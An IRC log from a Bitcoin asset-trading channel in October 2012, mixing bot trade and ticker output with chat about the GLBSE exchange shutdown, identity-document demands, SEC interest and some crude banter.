35600 @ 0.00033179 = 11.8117 BTC [-] Oct 07 19:27:06 ;;ticker Oct 07 19:27:06 Best bid: 11.93, Best ask: 11.97, Bid-ask spread: 0.04000, Last trade: 11.97, 24 hour volume: 62240, 24 hour low: 11.702, 24 hour high: 12.75999 Oct 07 19:33:35 oh look, a all-in-one https://www.therocktrading.com/en/exchange/stock Oct 07 19:34:42 [MPEX] [S.MPOE] 20557 @ 0.00033618 = 6.9109 BTC [+] Oct 07 19:34:44 [MPEX] [S.MPOE] 13843 @ 0.0003389 = 4.6914 BTC [+] Oct 07 19:35:56 L$? Oct 07 19:36:01 Linden Dollars? Oct 07 19:36:05 yes Oct 07 19:36:18 Nice dividend https://www.therocktrading.com/en/offers/RMIND Oct 07 19:37:26 #therocktrading Oct 07 19:38:06 no one is there Oct 07 19:38:07 lol Oct 07 19:38:52 no they don't irc Oct 07 19:39:43 i don't see much documentation on RMIND Oct 07 19:39:51 mission statement Oct 07 19:39:57 idk, looking Oct 07 19:40:01 i dont know who runs it Oct 07 19:40:06 but i know a guy that knows him Oct 07 19:40:09 thats it. Oct 07 19:40:18 LOL Oct 07 19:40:37 i've known him since before there was a bitcoin Oct 07 19:41:09 :Company Prospectus The Rock Mining Industries Total outstanding Shares 400000 100% Bitcoin Production The First Company traded in Bitcoin only!: Oct 07 19:42:03 yes before it was traded in lindens as all their other stuff, then it moved to bitcoins after linden temp closed their account because someone used stolen lindens to buy bitcoins from them on their exchange Oct 07 19:42:21 lol Oct 07 19:43:08 !!!, woah what? theymos said, "4-5. The database backups can be decrypted by me, justmoon, Gavin, Sirius, and Satoshi. The encrypted backups are distributed among many people." Satoshi!? Oct 07 19:43:24 smickles sure ? Oct 07 19:43:30 HOLY shit Oct 07 19:43:33 yeah that's the bitcointalk forum db Oct 07 19:43:36 https://bitcointalk.org/index.php?topic=115669.msg1251861#msg1251861 Oct 07 19:43:38 not glbse Oct 07 19:43:43 https://www.therocktrading.com/en/exchange/currency Oct 07 19:43:43 oh Oct 07 19:43:52 they have a dollar spread on btc/usd Oct 07 19:43:52 lol Oct 07 19:44:29 really? laugh at someone because they have temp low volume resulting in a big spread? like your exchange is better? Oct 07 19:45:10 kakobrekla: https://assets-otc.com/ Oct 07 19:45:27 wow dafuq is this Oct 07 19:46:48 I was just pointing out the crazy spread Oct 07 19:46:55 :P Oct 07 19:47:03 of course it is due to low volume Oct 07 19:50:28 https://bitcointalk.org/index.php?topic=115669.msg1251971#msg1251971 Oct 07 19:50:36 lol Oct 07 19:51:55 I honestly thought glbse had the sense to have an accountant Oct 07 19:54:12 https://therocktrading.com ?! Oct 07 19:54:15 da fuck is that lol Oct 07 19:54:33 Bitcoin Fixed Return Fund Oct 07 19:54:36 mkay. sigh. Oct 07 19:57:44 MrTiggr: https://therocktrading.com/en/exchange/stock Oct 07 19:57:47 mircea_popescu: https://therocktrading.com/en/exchange/stock Oct 07 19:58:13 [MPEX] [S.MPOE] 3600 @ 0.00033346 = 1.2005 BTC [-] Oct 07 19:58:14 [MPEX] [S.MPOE] 5600 @ 0.00033179 = 1.858 BTC [-] Oct 07 19:58:15 [MPEX] [S.MPOE] 4774191 @ 0.000315 = 1503.8702 BTC [-] Oct 07 19:59:08 oh boy Oct 07 19:59:33 boonies4u-Andro oic. Oct 07 20:00:24 though, i'm not seeing any description as to what these bonds represent XD Oct 07 20:01:02 right. Oct 07 20:01:09 seems to me like a ponzibond and a miningthing Oct 07 20:01:47 my guess is that they all represent some function of the "The Rock Trading Company" Oct 07 20:01:58 that assets-otc thing is funnay Oct 07 20:01:59 there's one for arbitrage Oct 07 20:02:00 <@assbot> [MPEX] [S.MPOE] 4774191 @ 0.000315 = 1503.8702 BTC [-] 0_o Oct 07 20:02:04 i thought ppl didn't like mpex. now copying it ? Oct 07 20:02:20 smickles whoa. was a 2mn ish one before, too Oct 07 20:02:29 or w/e, 1.1k btc Oct 07 20:02:43 well if you email them they will keep you up to date on the mining equipment and give you whatever info you ask Oct 07 20:02:55 anyway, about to take the girls to town! however before i go : http://trilema.com/2012/the-politics-of-bitcoin/ Oct 07 20:02:59 feel free to dump into reddit or w/e Oct 07 20:03:01 I don't think they're copying it Oct 07 20:03:05 I think they're shorting it :P Oct 07 20:03:25 boonies4u-Andro assets-otc thing looks like a retarded mpex to me. Oct 07 20:03:45 i'm just poking fun at what smickles posted Oct 07 20:03:47 :P Oct 07 20:05:23 there is a site you can see the management of the gpus and fpgas and what pools they are at and temps and hashes, but hehehe yes down atm Oct 07 20:06:15 [MPEX] [S.MPOE] 1363237 @ 0.000315 = 429.4197 BTC [-] Oct 07 20:06:28 mm Oct 07 20:06:31 gpumax? Oct 07 20:06:32 !ticker s.mpoe Oct 07 20:06:34 [MPEX:S.MPOE] 1day: 0.00025015 / 0.00031575 / 0.00037575 (12741096 shares, 4,023.10 BTC), 30day: 0.00025015 / 0.0003733 / 0.00042 (76270870 shares, 28,472.03 BTC) Oct 07 20:07:11 those moving averages? Oct 07 20:08:03 yes Oct 07 20:08:11 so i've rebought today like i dunno, half my float ? Oct 07 20:08:12 wtf lol. Oct 07 20:09:12 I considered opening up a fund on GLBSE instead of getting a loan on btcjam Oct 07 20:09:50 I always liked that in the back of my head, if something bad happens and they lose confidence in the fund, I could buy back bonds Oct 07 20:15:18 looks like someone needs a lot of money suddenly and sells a lot of MPOE Oct 07 20:16:40 or is that panic sell? Oct 07 20:17:27 holy shit, the gov't representatives in romainia are elected by plurality, and they use a civil law based legal system? Oct 07 20:25:01 lol Oct 07 20:26:13 all other countries are run by little girls Oct 07 20:29:22 pigeons, oh you... *hihihihihihi* Oct 07 20:32:20 [MPEX] [S.MPOE] 18300 @ 0.00032349 = 5.9199 BTC [+] Oct 07 20:34:44 i find it kinda odd coldhardmetal left #glbse but is in the other #bitcoin chans... Oct 07 20:34:51 wonder what is going on there... Oct 07 20:37:05 Chaang-Noi: i dunno, but it seems like a good time to leave the parting message idid Oct 07 20:37:28 i did not see it Oct 07 20:37:32 iv been traveling Oct 07 20:37:42 i did it like 1 mn ago Oct 07 20:37:59 do i fail at operating a /part command? Oct 07 20:38:03 in #glbse ? Oct 07 20:38:10 yup Oct 07 20:38:31 ahhh Oct 07 20:38:32 yup Oct 07 20:38:43 so are you going to give your AML docs to Nefario ? Oct 07 20:38:44 and the message was? Oct 07 20:38:56 * smickles (~smickles@mostofmany.com) has left #GLBSE ("see you later shitlords") Oct 07 20:39:16 ;> Oct 07 20:39:23 Chaang-Noi: is it going to be docs like that? Oct 07 20:39:34 i wonder how many BTC and assets nefario will get to claim due to people not handing over AML stuff, or him just saying its not good enough... Oct 07 20:39:44 smickles it seems so Oct 07 20:40:16 its his "get out of jail free card if people are using glbse to support terrorist and money laundering" Oct 07 20:40:44 thats not a direct quote but something like that Oct 07 20:41:02 Chaang-Noi: we'll see. i suppose i'm waiting to be contacted directly, or see something on glbse proper Oct 07 20:41:20 yeah me too Oct 07 20:41:37 and in my case, he has a pic of my passport Oct 07 20:41:45 ahh Oct 07 20:41:50 well, my guess is that asset holders won't honor bonds Nefario holds Oct 07 20:41:54 sorry Oct 07 20:42:04 I meant, asset issuers won't honor bonds Nefario holds Oct 07 20:42:08 asset holders wont know who holds what Oct 07 20:42:23 let me correct myself Oct 07 20:42:24 :/ Oct 07 20:42:28 jeeze Oct 07 20:43:55 well, if i get a list of shareholders and associated amounts for s2cm and mpoe.etf, then i'll honor them Oct 07 20:44:02 otherwise, i cant Oct 07 20:44:34 also, fiduciary responcibility would require me to verify the lists somehow Oct 07 20:45:24 ;;gpg info nefario Oct 07 20:45:24 User 'nefario', with keyid 28DD49E2A68F4B7C, fingerprint 03B47461C1E526576917215728DD49E2A68F4B7C, and bitcoin address None, registered on Mon Jul 11 23:17:47 2011. http://bitcoin-otc.com/viewgpg.php?nick=nefario . Currently not authenticated. Oct 07 20:45:54 Would the data being signed by that keyid be sufficient verrification? Oct 07 20:46:17 probably as good as you can reasonably hope for in this situation Oct 07 20:49:57 regarding what goat was saying, I don't think issuers should let Nefario get any unclaimed bonds Oct 07 20:50:21 that would be rewarding his behavior Oct 07 20:51:38 unless Nefario is only going to be submitting addresses tied to number of bonds held Oct 07 20:52:02 then it might be difficult to determine who he is among the shareholders Oct 07 20:58:04 [MPEX] [S.MPOE] 71300 @ 0.00032346 = 23.0627 BTC [-] Oct 07 21:20:56 aml all stockholders and just assume none are a proxy for nefario? Oct 07 21:22:07 well, I suppose having multiple proxy accounts to fool issuers would work Oct 07 21:23:04 beh Oct 07 21:23:14 [MPEX] [S.MPOE] 8100 @ 0.00032114 = 2.6012 BTC [-] Oct 07 21:23:22 is that really true that there was so SEC etc agents poking at nefario? It was all just bullshit and excuse Oct 07 21:24:16 he is now scared he was breaking the law... Oct 07 21:24:26 and wants to protect him self as far as i can gather... Oct 07 21:24:38 incase the sec or what not comes in... Oct 07 21:24:46 would be best if nefario said something Oct 07 21:24:56 if the sec came down on him, no way would they let him still operate Oct 07 21:26:16 don't know if the sec contacted nefario, but the people who talked to the sec say the sec specifically was asking about glbse, "how you got your glbse account" and ppt funds on glbse Oct 07 21:26:56 for example danieldaniel (i know) Oct 07 21:28:18 yes the sec did contact nefario Oct 07 21:28:43 i have pretty solid info on that, but that was a while ago and he kept operating Oct 07 21:29:00 he then saw a lawyer and saw the light i guess... Oct 07 21:29:13 maybe it about getting asset holder info Oct 07 21:29:25 might explain why they let him keep operating Oct 07 21:29:49 it is about* Oct 07 21:29:52 pigeons: all they had to do was read the forum or use the Make a account. How stupid are the agents? LOL Oct 07 21:30:14 not that stupid for sure :) Oct 07 21:30:33 femtotube: i agree. but also i wonder if they were curious how the alleged "victims" got involved Oct 07 21:30:39 pigeons: the sec contacting nefario, while proving that they are sec Oct 07 21:30:52 not, someone on an anonymous account claiming to be sec Oct 07 21:31:00 boonies4u-Andro: the sec proved to me they were the sec Oct 07 21:31:12 how? Oct 07 21:31:58 fuck, you really don't believe the sec sent otc members an email saying there is a private investigation into bitcoin securities, and that most of us didn't research to a comfortable degree wether or not it was legit? Oct 07 21:32:58 I doubt the sec, or anyone claiming to be the sec sent you, nefario, or goat emails Oct 07 21:33:42 we called them, using the phone number on the particular investigators name on the website gave the reference nu,ber on the email and asked if they sent it Oct 07 21:33:45 the ysaid they did Oct 07 21:34:53 are you saiying that me and practically all the people i trust here are lying? or at which point in this step did they fools us? cause i'll give you another way it was verified at that point Oct 07 21:34:58 I guess nefario was just bullshitting everyone in London Oct 07 21:35:23 so the emails contained the information necessary to confirm that they sent you the email(s) Oct 07 21:35:25 moving glbse and what not. Oct 07 21:35:27 so the emails contained the information necessary to confirm that they sent you the email(s)? Oct 07 21:35:36 one sec i'll show it to you Oct 07 21:35:39 sorry, didn't realize I double posted Oct 07 21:38:29 http://pastebin.com/pyFKBRj5 Oct 07 21:39:07 look that guy up with google, call his office, ask if he sent the email about NY-8834 and what it's about Oct 07 21:39:58 I guess I had to literally beg you to believe that Yes The SEC is Interested IN GLBSE. Oct 07 21:41:30 yeah they are interested Oct 07 21:41:45 california girls we're undeniable Oct 07 21:41:52 fine fresh fierce we got it on lock Oct 07 21:41:58 sun kissed skin so hot Oct 07 21:42:02 we'll met your popsicle Oct 07 21:42:04 oh oh oh oh oh oh Oct 07 21:42:06 oh oh oh oh oh oh Oct 07 21:42:49 rg, ftw Oct 07 21:43:05 sure doesnt feel like a win Oct 07 21:43:09 so much drama on the forum still Oct 07 21:43:15 about me saying 'glbse has backups' Oct 07 21:43:23 guruvan is now claiming that that's releasing customer info Oct 07 21:43:46 smickles breaths oxygen and needs food to live. Oct 07 21:43:56 ^--- releasing customer info! Oct 07 21:46:23 pigeons: i knew they were interested, I just didn't expect them to knock before coming in Oct 07 21:47:02 they did Oct 07 21:47:57 hehe Oct 07 21:48:00 this all started with pirate Oct 07 21:48:06 without pirate the SEC still wouldnt know what bitcoin is Oct 07 21:48:13 it did kinda start with pirate Oct 07 21:48:24 [MPEX] [S.MPOE] 65700 @ 0.000315 = 20.6955 BTC [-] Oct 07 21:50:23 i guess the funniest part about all this Oct 07 21:50:27 is it proves mircea correct Oct 07 21:50:33 with his glbse hate-paper Oct 07 21:56:20 https://bitcointalk.org/index.php?topic=117009.msg1253694#msg1253694 Oct 07 21:57:24 this SEC bull shit is starting to sound more stupid by the minute. Oct 07 21:57:34 Evolvex works for the SEC and wants one link to visit Oct 07 21:59:55 Did theymos send the coins nefario claims to be waiting on? Oct 07 22:00:27 "Matthewh3 - "All users coins on the GLBSE is safe and untouched. Nafario wants to return them as soon as possible as they are a legal liability to him. He also said he will soon have a way for asset issuers to pay dividends but not trade shares. "" Oct 07 22:00:32 uhoh Oct 07 22:01:05 sounds like those who don't want trouble can't sell their shares if they wanted to Oct 07 22:01:59 i worry from matthewh3's report that nefario may feel he needs those coins to pay a lawyer for survival may thus feel justified if he "can't" return them. Oct 07 22:02:42 But to be less shitty to nefario, I beleived what theymos reported word for word, and either theymos did stretch that, or nefario is lying Oct 07 22:03:43 anyway, the sooner coins are returned and accounts codes given out, the better. Oct 07 22:06:18 true, but there will always be some people who won't submit documents Oct 07 22:06:47 Nafario hasn't paid a penny in legal fees and no Theymos has not sent any coins. The only way everyone won't get there coins is if Theymos doesn't return them. That's all I'm saying from now on and probably shouldn't have even said that :/ Oct 07 22:07:12 yeah, well everything should be returned without submitting any documents other than the acocunt information nefario already has Oct 07 22:08:03 Matthewh3 - "I think he will need full legal ID to pay back coins and shares. Otherwise he risks being charged with possible money laundering and/or funding terrorism. Tho he won't disclose that information unless requested by the government/police." Oct 07 22:08:41 the question is what will happen to shares and coins that aren't claimed? Oct 07 22:08:49 I think they should go back to the issuer if that is the case Oct 07 22:09:01 they go to the issuer anyway Oct 07 22:09:12 I'm not Nefario's PR and probably shouldn't have spoke about our private conversation. Oct 07 22:09:49 i know you're not matthewh3, and thanks for letting us know, i understand what you're saying Oct 07 22:10:17 probably not Oct 07 22:12:32 if you are shutting down, you get out as fast as you can, let everyone have their stuff back. if you require new id to give back someone's stuff, you either are going to give that info to somebody, or you think you may need to bargain giving that info to somebody in the future Oct 07 22:13:02 you wouldn't want to take everyone's info to add to the shit you're in otherwise Oct 07 22:13:42 [MPEX] [S.MPOE] 800 @ 0.00031544 = 0.2524 BTC [+] Oct 07 22:13:53 if he doesn't end up asking for id then i was too critical of nefario Oct 07 22:14:59 if he doesn't end up asking for id, GLBSE is going to be dead Oct 07 22:15:17 and Nefario is going to go to jail Oct 07 22:15:28 if this is as bad as we think it is Oct 07 22:18:25 i dont think nefario will go to jail Oct 07 22:18:29 they told him to stop-- he did Oct 07 22:18:48 now if glbse.bit or glbse.onion showed up Oct 07 22:18:52 theyd probably go after him again Oct 07 22:19:18 if he doesn't end up asking for id Oct 07 22:19:45 and he returns the coins Oct 07 22:21:10 ;;seen nefario Oct 07 22:21:10 nefario was last seen in #bitcoin-assets 1 week, 5 days, 23 hours, 21 minutes, and 13 seconds ago: Those assets are not listed or traded anymore Oct 07 22:21:26 hmmm Oct 07 22:22:27 ;;echo nefario was last seen in #bitcoin-assets 50 years, 1 week, 5 days, 23 hours, 21 minutes, and 13 seconds ago: Those assets are not listed or traded anymore Oct 07 22:22:28 nefario was last seen in #bitcoin-assets 50 years, 1 week, 5 days, 23 hours, 21 minutes, and 13 seconds ago: Those assets are not listed or traded anymore Oct 07 22:22:41 There Oct 07 22:24:32 05-10-12-17:17--- NO_OOh1 [~james@92.40.254.189.threembb.co.uk] has joined #bitcoin-assets Oct 07 22:24:39 ^last seen Oct 07 22:25:02 I think if a I2p exchange popped up and used hybrid wallets like blockchain.info then users wouldn't have to worry about the OP's running off with all the coins. If an I2p exchange popped like the GLBSE, Cryptostocks or LTC-Global how could users trust them. I know The Silk Road as been operational for a while but it could just disappear anytime? Oct 07 22:34:33 killed buffer? Oct 07 22:34:36 that's new to me Oct 07 22:35:59 how bout nao Oct 07 22:38:45 i know he could have put in any reason for quitting Oct 07 22:38:52 [MPEX] [S.MPOE] 15900 @ 0.00031508 = 5.0098 BTC [-] Oct 07 22:38:54 [MPEX] [S.MPOE] 62453 @ 0.000315 = 19.6727 BTC [-] Oct 07 22:38:57 but "killed buffer" sounds like some kind of server message Oct 07 22:39:05 its not Oct 07 22:42:37 https://bitcointalk.org/index.php?topic=117009.0 Oct 07 22:42:54 brilliant move, say nothing to anyone except an illiterate 9 year old Oct 07 22:44:12 I just realized I was using the wrong name Oct 07 22:44:13 silly me Oct 07 23:00:24 [MPEX] [O.BTCUSD.C150T] 9 @ 0.08179875 = 0.7362 BTC [+] Oct 07 23:25:54 [MPEX] [S.MPOE] 35808 @ 0.000315 = 11.2795 BTC [-] Oct 07 23:51:05 [MPEX] [S.MPOE] 28200 @ 0.00031333 = 8.8359 BTC [-] Oct 07 23:51:36 !ticker s.dice Oct 07 23:51:38 [MPEX:S.DICE] 1day: 0.0032 / 0.00327011 / 0.00339995 (454373 shares, 1,485.85 BTC), 30day: 0.0032 / 0.00333843 / 0.0034 (1700331 shares, 5,676.45 BTC) Oct 08 00:16:19 [MPEX] [S.MPOE] 1100 @ 0.00031235 = 0.3436 BTC [-] Oct 08 00:16:20 [MPEX] [S.MPOE] 31700 @ 0.00031177 = 9.8831 BTC [-] Oct 08 00:41:58 [MPEX] [S.MPOE] 2286 @ 0.00030962 = 0.7078 BTC [-] Oct 08 00:41:58 [MPEX] [S.MPOE] 9545 @ 0.0003096 = 2.9551 BTC [-] Oct 08 01:06:05 ;;seen usagi Oct 08 01:06:05 usagi was last seen in #bitcoin-assets 2 days, 14 hours, 52 minutes, and 23 seconds ago: We own 2000 shares.. should be good if glbse comes up :/ Oct 08 01:07:37 [MPEX] [S.MPOE] 23100 @ 0.00030963 = 7.1525 BTC [+] Oct 08 01:13:19 jurov, may i suggest disabling the away thingy Oct 08 01:14:12 why? it clutters the channel? Oct 08 01:14:37 kinda annoying and redundant Oct 08 01:17:20 PsychoticBoy: so I think usagi just ragequit forever Oct 08 01:19:26 okay, znc set up, thx kakobrekla for reminder Oct 08 01:19:43 thanks Oct 08 01:29:48 PsychoticBoy: I dont really blame him Oct 08 01:29:57 PsychoticBoy: his assets got hit much worse than mine did Oct 08 01:32:54 [MPEX] [S.MPOE] 192 @ 0.00031333 = 0.0602 BTC [+] Oct 08 01:32:56 [MPEX] [S.MPOE] 33408 @ 0.00031544 = 10.5382 BTC [+] Oct 08 01:33:21 [18:13] jurov, may i suggest disabling the away thingy Oct 08 01:33:24 pff Oct 08 01:33:30 doing nick|away is so 1995 Oct 08 01:33:35 jurov is just paying homage Oct 08 01:33:36 to the past Oct 08 01:33:42 i used to do nick-afk Oct 08 01:33:43 etc Oct 08 01:34:01 I used to kline people for away. Oct 08 01:34:11 how long were you an ircop for Oct 08 01:34:12 a month? Oct 08 01:34:24 on efnet? roughly that. Oct 08 01:34:29 lol... did not realize, but i did return to irc after 15yrs Oct 08 01:34:30 makes sense Oct 08 01:34:43 so how is this train wreck doing Oct 08 01:34:50 ;;ticker Oct 08 01:34:50 Best bid: 11.80044, Best ask: 11.94, Bid-ask spread: 0.13956, Last trade: 11.94, 24 hour volume: 63403, 24 hour low: 11.7, 24 hour high: 12.6185 Oct 08 01:34:56 ;;asks 12.70 Oct 08 01:34:58 There are currently 14917.521 bitcoins offered at or under 12.7 USD, worth 184121.05157 USD in total. Oct 08 01:35:32 jcpham: the train wreck is still going Oct 08 01:35:46 15 years is a long time people had to see that away message Oct 08 01:35:48 pretty much every asset holder has said they wont return if their records can be recovered Oct 08 01:37:33 yeah, i forgot my lil' server with linux 0.9 and irc bouncer is 15yrs running Oct 08 01:38:26 >15 years ago, 0.9 Oct 08 01:38:29 dont think so Oct 08 01:41:34 I mean, hell, the first 2.0 came out like 16 years ago Oct 08 01:41:51 which was a little before I started using linux Oct 08 01:42:21 i started in '99, so don't remember much before Oct 08 01:42:43 Ive been using linux for around that long Oct 08 01:42:44 but it's always the same crap. only fucking artist can come up with such error msg: "problem-driven null cycle problems=1" Oct 08 01:43:07 i'm trying to set up jackd to use instead of my hearing aids Oct 08 01:43:33 I started linux when debian had potato unstable, and slink was released in 1999 Oct 08 01:43:36 so Im thinking 1998 or so Oct 08 01:43:41 if it works, it does nicely. but every while something blows up Oct 08 01:43:50 so about 14-15 years ago Oct 08 01:49:46 what is linux Oct 08 01:50:11 [MPEX] [O.BTCUSD.C140T] 8 @ 0.10200758 = 0.8161 BTC [+] Oct 08 01:50:18 some wannabe operating system Oct 08 01:50:31 never heard of it... is it like windows? Oct 08 01:50:41 it is now Oct 08 01:50:53 nice Oct 08 01:51:01 drinka PBR and move to Plan9 Oct 08 01:51:14 heh plan9 =/ Oct 08 01:51:18 i'll stay with CP/M, thanks Oct 08 01:55:53 Yea, I jumped into linux land around 1998ish. Redhat 5.2 baby. Oct 08 01:57:18 Even had a retail boxed copy I think. Oct 08 01:57:22 Wish I could find that now. Oct 08 02:15:53 [MPEX] [S.MPOE] 36500 @ 0.00031287 = 11.4198 BTC [-] Oct 08 02:15:55 [MPEX] [S.MPOE] 842 @ 0.0003116 = 0.2624 BTC [-] Oct 08 02:36:56 holy shit, the gov't representatives in romainia are elected by plurality, and they use a civil law based legal system? <<< yes. Oct 08 02:38:30 femtotube> is that really true that there was so SEC etc agents poking at nefario? It was all just bullshit and excuse << the first part for sure. the 2nd very likely. Oct 08 02:42:02 [MPEX] [S.BVPS] 473 @ 0.00349146 = 1.6515 BTC [+] Oct 08 02:42:04 [MPEX] [S.BVPS] 77 @ 0.00345638 = 0.2661 BTC [-] Oct 08 02:48:41 check out atlas' latest vblog Oct 08 02:48:43 https://www.youtube.com/watch?v=v0PeBwzvQds Oct 08 02:55:07 atlas vblogs ?! Oct 08 02:55:31 needs flash ;/ Oct 08 03:01:07 [MPEX] [O.BTCUSD.C110T] 4 @ 0.21743878 = 0.8698 BTC [-] Oct 08 03:03:29 http://imgur.com/gallery/jdKRy Oct 08 03:05:40 wff Oct 08 03:24:53 guess I should watch this gangam video or whatever Oct 08 03:26:58 [MPEX] [S.MPOE] 20800 @ 0.00031276 = 6.5054 BTC [+] Oct 08 03:27:00 [MPEX] [O.BTCUSD.P120N] 2 @ 0.25 = 0.5 BTC [-] Oct 08 03:30:26 [MPEX] [O.BTCUSD.C070T] 177 @ 0.51951231 = 91.9537 BTC [+] Oct 08 03:31:26 [MPEX] [O.BTCUSD.C070T] 177 @ 0.51951231 = 91.9537 BTC [+] Oct 08 03:31:47 [MPEX] [O.BTCUSD.C070T] 1 @ 0.51951231 BTC [+] Oct 08 03:50:14 [MPEX] [O.BTCUSD.C110T] 3 @ 0.21701203 = 0.651 BTC [-] Oct 08 04:00:51 anyone looking for a little lol --> https://bitcointalk.org/index.php?topic=116835.msg1254832#msg1254832 2nd quote Oct 08 04:03:00 Funny, a guy I know went to law school to study and then practice internet law. Oct 08 04:03:40 internet law is thelaw! Oct 08 04:06:25 http://papers.ssrn.com/sol3/papers.cfm?abstract_id=807966 Oct 08 04:07:51 tragedy of the anticommons Oct 08 04:07:56 interesting concept Oct 08 04:08:05 tho it'd be an countertragedy of commonds i guess Oct 08 04:09:17 mircea_popescu: the fuck. Oct 08 04:09:22 yes ? Oct 08 04:09:27 2nd quote Oct 08 04:09:41 I need some sort of multidimensional popcorn machine Oct 08 04:09:45 hashaha Oct 08 04:11:18 so, am i the only person on btc interwebz who actually sued gubernment and won ? Oct 08 04:15:24 [MPEX] [S.MPOE] 48700 @ 0.00031236 = 15.2119 BTC [-] Oct 08 04:15:25 [MPEX] [S.MPOE] 14200 @ 0.00031224 = 4.4338 BTC [-] Oct 08 04:23:04 You might be. Oct 08 04:23:06 Romanian govt? Oct 08 04:23:10 yea. Oct 08 04:23:19 others never gave me the opportunity. Oct 08 04:40:28 [MPEX] [S.MPOE] 48700 @ 0.00031224 = 15.2061 BTC [-] Oct 08 05:00:50 [MPEX] [O.BTCUSD.C140T] 2 @ 0.09878951 = 0.1976 BTC [-] Oct 08 05:15:38 [MPEX] [O.BTCUSD.C090T] 777 @ 0.34645233 = 269.1935 BTC [-] Oct 08 05:18:01 o wow glbse is back! Oct 08 05:20:23 yes? Oct 08 05:20:30 I don't see it Oct 08 05:20:40 mircea_popescu: liar Oct 08 05:20:47 mircea_popescu: things you would say if this was magical candy land? Oct 08 05:20:57 i'm just being an asshole. Oct 08 05:21:02 oh okay Oct 08 05:21:05 copumpkin yes, this is dawg. Oct 08 05:21:09 hi gulliblepumpkin Oct 08 05:21:13 hi! Oct 08 05:21:18 xD Oct 08 05:26:07 o wow glbse is back! Oct 08 05:26:07 mircea_popescu, you are a sick, sic, person Oct 08 05:26:22 lol Oct 08 05:26:50 lol Oct 08 05:27:13 gotta change my "hey, pirate paid!" line with something. Oct 08 05:27:18 trying to keep with the trends. Oct 08 05:31:55 mircea_popescu, looks like mpex is down Oct 08 05:32:14 ya, i took it down to bring v2.0 Oct 08 05:32:53 (also, there's an old ww2 air raid alarm that sounds if the site goes down) Oct 08 05:33:00 (or so we think, as it's not happened yet) Oct 08 05:34:30 i heard it Oct 08 05:40:59 [MPEX] [S.MPOE] 11500 @ 0.00031224 = 3.5908 BTC [-] Oct 08 05:40:59 [MPEX] [S.MPOE] 29288 @ 0.00031173 = 9.1299 BTC [-] Oct 08 05:41:42 Hey, mybitcoin returned the money! Oct 08 05:42:09 Hey, bittomat.pl is back in business! Oct 08 05:42:20 Etc... Oct 08 05:44:22 at least mtgox stepped in and covered for the .pl neh ? Oct 08 05:45:12 Yeah, the only clusterfuck covered in bitcoin history? Oct 08 05:48:31 Glad that mtgox hasn't keep covering clusterfuck. They would own the whole economy at this moment Oct 08 05:48:45 And that economy would be nothing but debt Oct 08 05:50:05 and it could rename itself to mtgous Oct 08 05:50:49 but anyway. i offered to buy glbbq back in may. ofcourse then they were still into this "we know shit" mode. Oct 08 05:50:50 Or bitfdic Oct 08 05:51:57 Well, maybe you can buy it now.... Oct 08 05:52:22 And you can run the bitfdic Oct 08 05:52:40 Buy pirate, hashking, nkcrazze... Oct 08 05:52:51 Well, it's a long list.... Oct 08 05:55:12 I wonder if we can claim this is our great depression Oct 08 05:55:20 it kinda is. Oct 08 05:55:29 past 6 weeks or so. Oct 08 05:55:34 Bring some keynessians! Oct 08 05:55:51 Let's print bitcoins! Oct 08 05:56:28 Let's pay for people to make holes, and for other people to close them! Oct 08 05:56:34 It has to work Oct 08 05:57:49 lol Oct 08 05:58:01 depressions are good. Oct 08 05:58:05 they cull the weak. Oct 08 05:58:33 teach people about their personal inferiority, force them to recognize and bow to their superiors, Oct 08 05:58:41 a world without depressions is not worth living in. Oct 08 05:58:56 Well, now I'm depressed Oct 08 05:58:59 xD Oct 08 05:59:01 lol Oct 08 05:59:15 quick, let's print more rdponticelli ! Oct 08 05:59:27 No, please Oct 08 05:59:37 you dont print pasta Oct 08 05:59:40 That can't be good Oct 08 05:59:42 well, you can Oct 08 05:59:51 mircea_popescu: there are no superiors here Oct 08 05:59:58 even I failed at getting this shit rolling Oct 08 06:00:03 and Im a fuckload better than the rest of you Oct 08 06:00:05 apparently you need another depression. Oct 08 06:00:14 don't worry, it'll come for you. Oct 08 06:00:21 I drop that idea when I saw Multiplicity Oct 08 06:00:47 All the other at the end will fuck your girl.... Oct 08 06:05:45 Diablo-D3: do you really wasn't aware when you was writing your plan that there wasn't a minimal chance that it would end well? Oct 08 06:06:06 rdponticelli: did you just do a triple negative? Oct 08 06:06:21 [MPEX] [S.MPOE] 14800 @ 0.00031173 = 4.6136 BTC [-] Oct 08 06:06:32 Yeah, maybe you too when you tryied... Oct 08 06:06:41 :) Oct 08 06:06:59 rdponticelli: there was a large chance of success if everyone pulled together Oct 08 06:07:09 pretty much _no one_ pulled together Oct 08 06:08:22 Maybe... Oct 08 06:08:38 Maybe we just not have the same idea about largeness... Oct 08 06:08:48 hahaha Oct 08 06:08:57 great line to use on a girl, tell her you have a large cock Oct 08 06:09:03 then in bed when she's all huh ? you go... Oct 08 06:09:07 Maybe we just not have the same idea about largeness... Oct 08 06:10:16 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.16390534 = 163.9053 BTC [-] Oct 08 06:10:38 mircea_popescu: ;) Oct 08 06:11:31 just find smaller girls tbh Oct 08 06:11:38 cock looks bigger in their little hands Oct 08 06:12:28 at least thats what, my friend said Oct 08 06:12:46 you have friends now ? Oct 08 06:30:32 [MPEX] [O.BTCUSD.C110T] 2 @ 0.21288428 = 0.4258 BTC [-] Oct 08 06:49:31 anyone know if nefario is requiring ID just for the bitcoin withdrawls, or for proof of ownership of assets as well? Oct 08 06:49:58 novusordo noone knows anything. Oct 08 06:50:14 figured, just curious Oct 08 06:50:15 This ^^ Oct 08 06:50:31 It's just pure speculation Oct 08 06:50:41 but i'm sure once pirate starts to pay people... Oct 08 06:51:09 maybe pirate is nefario Oct 08 06:51:12 is atlas Oct 08 06:51:16 is MNW Oct 08 06:51:22 and zhoutong Oct 08 06:51:43 throw obama in there while you're at it. Oct 08 06:55:48 [MPEX] [S.MPOE] 18712 @ 0.00031173 = 5.8331 BTC [-] Oct 08 06:55:50 [MPEX] [S.MPOE] 26488 @ 0.0003116 = 8.2537 BTC [-] **** BEGIN LOGGING AT Mon Oct 8 15:05:04 2012 Oct 08 15:06:58 it is odd seeing nefario go after theymos, one of the most trusted people around Oct 08 15:08:26 or at least trusted before his entire sell shares sinking ship thing. Oct 08 15:09:38 who would not want to sell? also he was selling becasue he did not like the direction glbse was going, the legal path, theymos made that clear Oct 08 15:09:47 ;;ticker Oct 08 15:09:47 Best bid: 11.02502, Best ask: 11.12, Bid-ask spread: 0.09498, Last trade: 11.02502, 24 hour volume: 86323, 24 hour low: 10.621, 24 hour high: 12.21 Oct 08 15:09:53 whoa whoa Oct 08 15:09:55 id sell too if i 